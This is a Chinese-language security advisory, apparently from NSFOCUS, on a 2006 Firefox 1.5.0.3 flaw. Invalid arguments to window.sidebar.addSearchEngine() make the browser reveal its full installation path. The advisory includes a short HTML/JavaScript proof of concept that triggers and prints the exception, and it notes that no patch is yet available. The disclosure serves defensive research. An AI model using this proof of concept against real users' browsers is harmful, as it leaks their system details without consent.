首页 -> 安全研究

安全研究

安全漏洞
Firefox异常处理完整路径泄露漏洞

发布日期:2006-05-23
更新日期:2006-05-23

受影响系统:
Mozilla Firefox 1.5.0.3
描述:
BUGTRAQ  ID: 18083

Mozilla Firefox是一款非常流行的开放源码WEB浏览器。

Firefox在返回某些异常时会包含有文件路径信息,允许以无效的参数调用“window.sidebar.addSearchEngine()”JavaScript函数导致泄露完整的安装路径。

<*来源:Martin Hassman (bugzilla@met.cz
  
  链接:http://secunia.com/advisories/20244/print/
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

<html>
<body>
<pre>
<script>
<!--

try {
    window.sidebar.addSearchEngine('http://www.adresa.cz/file.srcx', 'http://www.adresa.cz/file.png', 'Name', 'Category');
}
catch(e) {
    alert(e);
    document.writeln(e)
}

/*

nsSidebar.js

catch(ex)
{
  this.promptService.alert(null, "Failed to add the search engine."); // <- Exception "Not enough arguments [nsIPromptService.alert]"
  throw Components.results.NS_ERROR_INVALID_ARG;
}

nsIPromptService.idl

void alert(in nsIDOMWindow parent,
           in wstring dialogTitle,
           in wstring text);
*/

// -->
</script>
</pre>
</body>
</html>

建议:
厂商补丁:

Mozilla
-------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.mozilla.org/

浏览次数:2920
严重程度:22(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障